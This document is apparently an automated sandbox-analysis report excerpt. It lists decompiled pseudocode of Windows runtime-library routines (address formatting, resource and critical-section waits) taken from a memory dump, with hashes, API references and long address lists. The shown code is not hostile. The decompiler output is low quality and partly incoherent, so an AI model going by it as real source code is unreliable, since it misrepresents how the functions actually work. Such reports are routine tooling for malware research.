                                                                                                                                                    • Opcode Fuzzy Hash: 9469cab7991303735dddfe00092845cdfb858b218bfea2efab557bcef9c2ec08
                                                                                                                                                    • Instruction Fuzzy Hash: 5F5149317042226FEB15CE18CC80FA677AABFD4729F215259FC45DB2C4EA31EC458B98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E025214C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				char _v10;
                                                                                                                                                    				char _v140;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t24;
                                                                                                                                                    				void* _t26;
                                                                                                                                                    				signed int _t29;
                                                                                                                                                    				signed int _t34;
                                                                                                                                                    				signed int _t40;
                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                    				void* _t51;
                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                    				void* _t54;
                                                                                                                                                    				signed int _t57;
                                                                                                                                                    				void* _t58;
                                                                                                                                                    
                                                                                                                                                    				_t51 = __edx;
                                                                                                                                                    				_t24 =  *0x25c2088; // 0x767370ef
                                                                                                                                                    				_v8 = _t24 ^ _t57;
                                                                                                                                                    				_t45 = _a16;
                                                                                                                                                    				_t53 = _a4;
                                                                                                                                                    				_t52 = _a20;
                                                                                                                                                    				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                    					L10:
                                                                                                                                                    					_t26 = 0xc000000d;
                                                                                                                                                    				} else {
                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                    						if( *_t52 == _t45) {
                                                                                                                                                    							goto L3;
                                                                                                                                                    						} else {
                                                                                                                                                    							goto L10;
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						L3:
                                                                                                                                                    						_t28 =  &_v140;
                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                    							_push("[");
                                                                                                                                                    							_push(0x41);
                                                                                                                                                    							_push( &_v140);
                                                                                                                                                    							_t29 = E02517707();
                                                                                                                                                    							_t58 = _t58 + 0xc;
                                                                                                                                                    							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                    						}
                                                                                                                                                    						_t54 = E025213CB(_t53, _t28);
                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                    							_t34 = E02517707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                    							_t58 = _t58 + 0x10;
                                                                                                                                                    							_t54 = _t54 + _t34 * 2;
                                                                                                                                                    						}
                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                    							_t40 = E02517707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                    							_t58 = _t58 + 0x10;
                                                                                                                                                    							_t54 = _t54 + _t40 * 2;
                                                                                                                                                    						}
                                                                                                                                                    						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                    						 *_t52 = _t53;
                                                                                                                                                    						if( *_t52 < _t53) {
                                                                                                                                                    							goto L10;
                                                                                                                                                    						} else {
                                                                                                                                                    							E024E2340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                    							_t26 = 0;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return E024EE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                    			}




















                                                                                                                                                    0x02521575
                                                                                                                                                    0x02521575
                                                                                                                                                    0x0252151e
                                                                                                                                                    0x0254ea50
                                                                                                                                                    0x0254ea55
                                                                                                                                                    0x0254ea58
                                                                                                                                                    0x0254ea58
                                                                                                                                                    0x0252152e
                                                                                                                                                    0x02521531
                                                                                                                                                    0x02521533
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02521535
                                                                                                                                                    0x02521541
                                                                                                                                                    0x02521549
                                                                                                                                                    0x02521549
                                                                                                                                                    0x02521533
                                                                                                                                                    0x025214f3
                                                                                                                                                    0x02521559

                                                                                                                                                    APIs
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0254EA22
                                                                                                                                                      • Part of subcall function 025213CB: ___swprintf_l.LIBCMT ref: 0252146B
                                                                                                                                                      • Part of subcall function 025213CB: ___swprintf_l.LIBCMT ref: 02521490
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0252156D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                    • Opcode ID: da0b8cd3d479ab947fb1bacbc33dfdfd96e2f4b451df79f8a73328bb679d21bb
                                                                                                                                                    • Instruction ID: c8d4dca7a1c956773ba0925fb6bbdbd34440fbdd4c17480d1273cc5db641556b
                                                                                                                                                    • Opcode Fuzzy Hash: da0b8cd3d479ab947fb1bacbc33dfdfd96e2f4b451df79f8a73328bb679d21bb
                                                                                                                                                    • Instruction Fuzzy Hash: 2D21C272A00A299BDF21DE58CC40AEFB7ACBF55305F448456EC4AD3181DB70AA588FD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                    			E025053A5(signed int _a4, char _a8) {
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t32;
                                                                                                                                                    				signed int _t37;
                                                                                                                                                    				signed int _t40;
                                                                                                                                                    				signed int _t42;
                                                                                                                                                    				void* _t45;
                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                    				signed int _t49;
                                                                                                                                                    				void* _t51;
                                                                                                                                                    				signed int _t57;
                                                                                                                                                    				signed int _t64;
                                                                                                                                                    				signed int _t71;
                                                                                                                                                    				void* _t74;
                                                                                                                                                    				intOrPtr _t78;
                                                                                                                                                    				signed int* _t79;
                                                                                                                                                    				void* _t85;
                                                                                                                                                    				signed int _t86;
                                                                                                                                                    				signed int _t92;
                                                                                                                                                    				void* _t104;
                                                                                                                                                    				void* _t105;
                                                                                                                                                    
                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                    				_t32 =  *(_t64 + 0x28);
                                                                                                                                                    				_t71 = _t64 + 0x28;
                                                                                                                                                    				_push(_t92);
                                                                                                                                                    				if(_t32 < 0) {
                                                                                                                                                    					_t78 =  *[fs:0x18];
                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                    						goto L3;
                                                                                                                                                    					} else {
                                                                                                                                                    						__eflags = _t32 | 0xffffffff;
                                                                                                                                                    						asm("lock xadd [ecx], eax");
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L3:
                                                                                                                                                    					_push(_t86);
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L4:
                                                                                                                                                    						__eflags = _t32;
                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                    							__eflags = 0;
                                                                                                                                                    							return 0;
                                                                                                                                                    						} else {
                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                    							_t79 = _t64 + 0x24;
                                                                                                                                                    							_t71 = 1;
                                                                                                                                                    							asm("lock xadd [eax], ecx");
                                                                                                                                                    							_t32 =  *(_t64 + 0x28);
                                                                                                                                                    							_a4 = _t32;
                                                                                                                                                    							__eflags = _t32;
                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                    								L19:
                                                                                                                                                    								_t86 = 0;
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    								while(1) {
                                                                                                                                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x025c01c0;
                                                                                                                                                    									_push(_t92);
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_t37 = E024DF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                    									__eflags = _t37 - 0x102;
                                                                                                                                                    									if(_t37 != 0x102) {
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t71 =  *(_t92 + 4);
                                                                                                                                                    									_t85 =  *_t92;
                                                                                                                                                    									_t51 = E02524FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                    									_push(_t85);
                                                                                                                                                    									_push(_t51);
                                                                                                                                                    									E02533F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                    									E02533F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                    									_t86 = _t86 + 1;
                                                                                                                                                    									_t105 = _t104 + 0x28;
                                                                                                                                                    									__eflags = _t86 - 2;
                                                                                                                                                    									if(__eflags > 0) {
                                                                                                                                                    										E0256217A(_t71, __eflags, _t64);
                                                                                                                                                    									}
                                                                                                                                                    									_push("RTL: Re-Waiting\n");
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_push(0x65);
                                                                                                                                                    									E02533F92();
                                                                                                                                                    									_t104 = _t105 + 0xc;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t37;
                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                    									_push(_t37);
                                                                                                                                                    									E02523915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                    									asm("int3");
                                                                                                                                                    									_t40 =  *_t71;
                                                                                                                                                    									 *_t71 = 0;
                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                    										L1:
                                                                                                                                                    										_t42 = E02505384(_t92 + 0x24);
                                                                                                                                                    										if(_t42 != 0) {
                                                                                                                                                    											goto L31;
                                                                                                                                                    										} else {
                                                                                                                                                    											goto L2;
                                                                                                                                                    										}
                                                                                                                                                    									} else {
                                                                                                                                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                    										_push( &_a4);
                                                                                                                                                    										_push(_t40);
                                                                                                                                                    										_t49 = E024DF970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                    										__eflags = _t49;
                                                                                                                                                    										if(__eflags >= 0) {
                                                                                                                                                    											goto L1;
                                                                                                                                                    										} else {
                                                                                                                                                    											_push(_t49);
                                                                                                                                                    											E02523915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                    											L31:
                                                                                                                                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                    											_push( &_a4);
                                                                                                                                                    											_push(1);
                                                                                                                                                    											_t42 = E024DF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                    											__eflags = _t42;
                                                                                                                                                    											if(__eflags >= 0) {
                                                                                                                                                    												L2:
                                                                                                                                                    												return _t42;
                                                                                                                                                    											} else {
                                                                                                                                                    												_push(_t42);
                                                                                                                                                    												E02523915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                    												_push( &_a4);
                                                                                                                                                    												_push(1);
                                                                                                                                                    												_t42 = E024DF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                    												__eflags = _t42;
                                                                                                                                                    												if(__eflags >= 0) {
                                                                                                                                                    													goto L2;
                                                                                                                                                    												} else {
                                                                                                                                                    													_push(_t42);
                                                                                                                                                    													_t45 = E02523915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                    													asm("int3");
                                                                                                                                                    													while(1) {
                                                                                                                                                    														_t74 = _t45;
                                                                                                                                                    														__eflags = _t45 - 1;
                                                                                                                                                    														if(_t45 != 1) {
                                                                                                                                                    															break;
                                                                                                                                                    														}
                                                                                                                                                    														_t86 = _t86 | 0xffffffff;
                                                                                                                                                    														_t45 = _t74;
                                                                                                                                                    														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                    														__eflags = _t45 - _t74;
                                                                                                                                                    														if(_t45 != _t74) {
                                                                                                                                                    															continue;
                                                                                                                                                    														} else {
                                                                                                                                                    															_t46 =  *[fs:0x18];
                                                                                                                                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                    															return _t46;
                                                                                                                                                    														}
                                                                                                                                                    														goto L37;
                                                                                                                                                    													}
                                                                                                                                                    													E02505329(_t74, _t92);
                                                                                                                                                    													_push(1);
                                                                                                                                                    													return E025053A5(_t92);
                                                                                                                                                    												}
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    								} else {
                                                                                                                                                    									_t32 =  *(_t64 + 0x28);
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_t71 =  *_t79;
                                                                                                                                                    								__eflags = _t71;
                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                    									while(1) {
                                                                                                                                                    										_t57 = _t71;
                                                                                                                                                    										asm("lock cmpxchg [edi], esi");
                                                                                                                                                    										__eflags = _t57 - _t71;
                                                                                                                                                    										if(_t57 == _t71) {
                                                                                                                                                    											break;
                                                                                                                                                    										}
                                                                                                                                                    										_t71 = _t57;
                                                                                                                                                    										__eflags = _t57;
                                                                                                                                                    										if(_t57 > 0) {
                                                                                                                                                    											continue;
                                                                                                                                                    										}
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t32 = _a4;
                                                                                                                                                    									__eflags = _t71;
                                                                                                                                                    								}
                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                    									continue;
                                                                                                                                                    								} else {
                                                                                                                                                    									goto L19;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						goto L37;
                                                                                                                                                    					}
                                                                                                                                                    					_t71 = _t71 | 0xffffffff;
                                                                                                                                                    					_t32 = 0;
                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                    					__eflags = 0;
                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                    						goto L4;
                                                                                                                                                    					} else {
                                                                                                                                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				L37:
                                                                                                                                                    			}

























                                                                                                                                                    0x025423b3
                                                                                                                                                    0x025423b4
                                                                                                                                                    0x025423b9
                                                                                                                                                    0x025423ba
                                                                                                                                                    0x025423ba
                                                                                                                                                    0x025423bc
                                                                                                                                                    0x025423bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539153
                                                                                                                                                    0x02539158
                                                                                                                                                    0x0253915a
                                                                                                                                                    0x0253915e
                                                                                                                                                    0x02539160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539166
                                                                                                                                                    0x02539166
                                                                                                                                                    0x02539171
                                                                                                                                                    0x02539176
                                                                                                                                                    0x02539176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539160
                                                                                                                                                    0x025423c6
                                                                                                                                                    0x025423cb
                                                                                                                                                    0x025423d7
                                                                                                                                                    0x025423d7
                                                                                                                                                    0x025423ad
                                                                                                                                                    0x02542390
                                                                                                                                                    0x02542373
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x02542291
                                                                                                                                                    0x02542291
                                                                                                                                                    0x02542293
                                                                                                                                                    0x02542295
                                                                                                                                                    0x0254229a
                                                                                                                                                    0x025422a1
                                                                                                                                                    0x025422a3
                                                                                                                                                    0x025422a7
                                                                                                                                                    0x025422a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422ab
                                                                                                                                                    0x025422ad
                                                                                                                                                    0x025422af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422af
                                                                                                                                                    0x025422b1
                                                                                                                                                    0x025422b4
                                                                                                                                                    0x025422b4
                                                                                                                                                    0x025422b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422b6
                                                                                                                                                    0x0254228f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254226d
                                                                                                                                                    0x025053cb
                                                                                                                                                    0x025053ce
                                                                                                                                                    0x025053d0
                                                                                                                                                    0x025053d4
                                                                                                                                                    0x025053d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025053d8
                                                                                                                                                    0x025053e3
                                                                                                                                                    0x025053ea
                                                                                                                                                    0x025053ea
                                                                                                                                                    0x025053d6
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025422F4
                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025422FC
                                                                                                                                                    • RTL: Resource at %p, xrefs: 0254230B
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 02542328
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                    • Opcode ID: 9932293b53c16352253d1f66e2140c44eaaa509fbdc771c22215d4a7027428ab
                                                                                                                                                    • Instruction ID: 198148aa8336803d15ce758401ed386a54124f3973a5b580c2e7ddae51fa3039
                                                                                                                                                    • Opcode Fuzzy Hash: 9932293b53c16352253d1f66e2140c44eaaa509fbdc771c22215d4a7027428ab
                                                                                                                                                    • Instruction Fuzzy Hash: 545116716106126BEB11DF28CC80FE677A9BF85328F104259FD05DB2C0FB61E8458FA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                    			E0250EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                    				signed int _v36;
                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                    				short _v66;
                                                                                                                                                    				char _v72;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                    				signed int _t40;
                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                    				signed int _t44;
                                                                                                                                                    				void* _t46;
                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                    				signed int _t49;
                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                    				signed char _t67;
                                                                                                                                                    				void* _t72;
                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                    				intOrPtr* _t80;
                                                                                                                                                    				intOrPtr _t84;
                                                                                                                                                    				intOrPtr* _t85;
                                                                                                                                                    				void* _t91;
                                                                                                                                                    				void* _t92;
                                                                                                                                                    				void* _t93;
                                                                                                                                                    
                                                                                                                                                    				_t80 = __edi;
                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                    				_t70 = __ecx;
                                                                                                                                                    				_t84 = _a4;
                                                                                                                                                    				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                    					E024FDA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                    					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                    				}
                                                                                                                                                    				_push(0);
                                                                                                                                                    				__eflags = _t38 - 0xffffffff;
                                                                                                                                                    				if(_t38 == 0xffffffff) {
                                                                                                                                                    					_t39 =  *0x25c793c; // 0x0
                                                                                                                                                    					_push(0);
                                                                                                                                                    					_push(_t84);
                                                                                                                                                    					_t40 = E024E16C0(_t39);
                                                                                                                                                    				} else {
                                                                                                                                                    					_t40 = E024DF9D4(_t38);
                                                                                                                                                    				}
                                                                                                                                                    				_pop(_t85);
                                                                                                                                                    				__eflags = _t40;
                                                                                                                                                    				if(__eflags < 0) {
                                                                                                                                                    					_push(_t40);
                                                                                                                                                    					E02523915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                    					asm("int3");
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L21:
                                                                                                                                                    						_t76 =  *[fs:0x18];
                                                                                                                                                    						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                    						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                    							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                    							_v66 = 0x1722;
                                                                                                                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                    							_t76 =  &_v72;
                                                                                                                                                    							_push( &_v72);
                                                                                                                                                    							_v28 = _t85;
                                                                                                                                                    							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                    							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                    							_push(0x10);
                                                                                                                                                    							_push(0x20402);
                                                                                                                                                    							E024E01A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                    						}
                                                                                                                                                    						while(1) {
                                                                                                                                                    							_t43 = _v8;
                                                                                                                                                    							_push(_t80);
                                                                                                                                                    							_push(0);
                                                                                                                                                    							__eflags = _t43 - 0xffffffff;
                                                                                                                                                    							if(_t43 == 0xffffffff) {
                                                                                                                                                    								_t71 =  *0x25c793c; // 0x0
                                                                                                                                                    								_push(_t85);
                                                                                                                                                    								_t44 = E024E1F28(_t71);
                                                                                                                                                    							} else {
                                                                                                                                                    								_t44 = E024DF8CC(_t43);
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _t44 - 0x102;
                                                                                                                                                    							if(_t44 != 0x102) {
                                                                                                                                                    								__eflags = _t44;
                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                    									_push(_t44);
                                                                                                                                                    									E02523915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                    									asm("int3");
                                                                                                                                                    									E02562306(_t85);
                                                                                                                                                    									__eflags = _t67 & 0x00000002;
                                                                                                                                                    									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                    										_t7 = _t67 + 2; // 0x4
                                                                                                                                                    										_t72 = _t7;
                                                                                                                                                    										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                    										__eflags = _t67 - _t67;
                                                                                                                                                    										if(_t67 == _t67) {
                                                                                                                                                    											E0250EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    									return 0;
                                                                                                                                                    								} else {
                                                                                                                                                    									__eflags = _v24;
                                                                                                                                                    									if(_v24 != 0) {
                                                                                                                                                    										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                    									}
                                                                                                                                                    									return 2;
                                                                                                                                                    								}
                                                                                                                                                    								goto L36;
                                                                                                                                                    							}
                                                                                                                                                    							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                    							_push(_t67);
                                                                                                                                                    							_t46 = E02524FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                    							_push(_t77);
                                                                                                                                                    							E02533F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                    							_t48 =  *_t85;
                                                                                                                                                    							_t92 = _t91 + 0x18;
                                                                                                                                                    							__eflags = _t48 - 0xffffffff;
                                                                                                                                                    							if(_t48 == 0xffffffff) {
                                                                                                                                                    								_t49 = 0;
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                    							}
                                                                                                                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                    							_push(_t49);
                                                                                                                                                    							_t50 = _v12;
                                                                                                                                                    							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                    							_push(_t85);
                                                                                                                                                    							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                    							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                    							E02533F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                    							_t53 =  *_t85;
                                                                                                                                                    							_t93 = _t92 + 0x20;
                                                                                                                                                    							_t67 = _t67 + 1;
                                                                                                                                                    							__eflags = _t53 - 0xffffffff;
                                                                                                                                                    							if(_t53 != 0xffffffff) {
                                                                                                                                                    								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                    								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _t67 - 2;
                                                                                                                                                    							if(_t67 > 2) {
                                                                                                                                                    								__eflags = _t85 - 0x25c20c0;
                                                                                                                                                    								if(_t85 != 0x25c20c0) {
                                                                                                                                                    									_t76 = _a4;
                                                                                                                                                    									__eflags = _a4 - _a8;
                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                    										E0256217A(_t71, __eflags, _t85);
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							_push("RTL: Re-Waiting\n");
                                                                                                                                                    							_push(0);
                                                                                                                                                    							_push(0x65);
                                                                                                                                                    							_a8 = _a4;
                                                                                                                                                    							E02533F92();
                                                                                                                                                    							_t91 = _t93 + 0xc;
                                                                                                                                                    							__eflags =  *0x7ffe0382;
                                                                                                                                                    							if( *0x7ffe0382 != 0) {
                                                                                                                                                    								goto L21;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						goto L36;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					return _t40;
                                                                                                                                                    				}
                                                                                                                                                    				L36:
                                                                                                                                                    			}

































                                                                                                                                                    0x025424cb
                                                                                                                                                    0x025424cd
                                                                                                                                                    0x025424d0
                                                                                                                                                    0x025424d1
                                                                                                                                                    0x025424d4
                                                                                                                                                    0x025424d6
                                                                                                                                                    0x025424d9
                                                                                                                                                    0x025424d9
                                                                                                                                                    0x025424dc
                                                                                                                                                    0x025424df
                                                                                                                                                    0x025424e1
                                                                                                                                                    0x025424e7
                                                                                                                                                    0x025424e9
                                                                                                                                                    0x025424ec
                                                                                                                                                    0x025424ef
                                                                                                                                                    0x025424f2
                                                                                                                                                    0x025424f2
                                                                                                                                                    0x025424ef
                                                                                                                                                    0x025424e7
                                                                                                                                                    0x025424fa
                                                                                                                                                    0x025424ff
                                                                                                                                                    0x02542501
                                                                                                                                                    0x02542503
                                                                                                                                                    0x02542506
                                                                                                                                                    0x0254250b
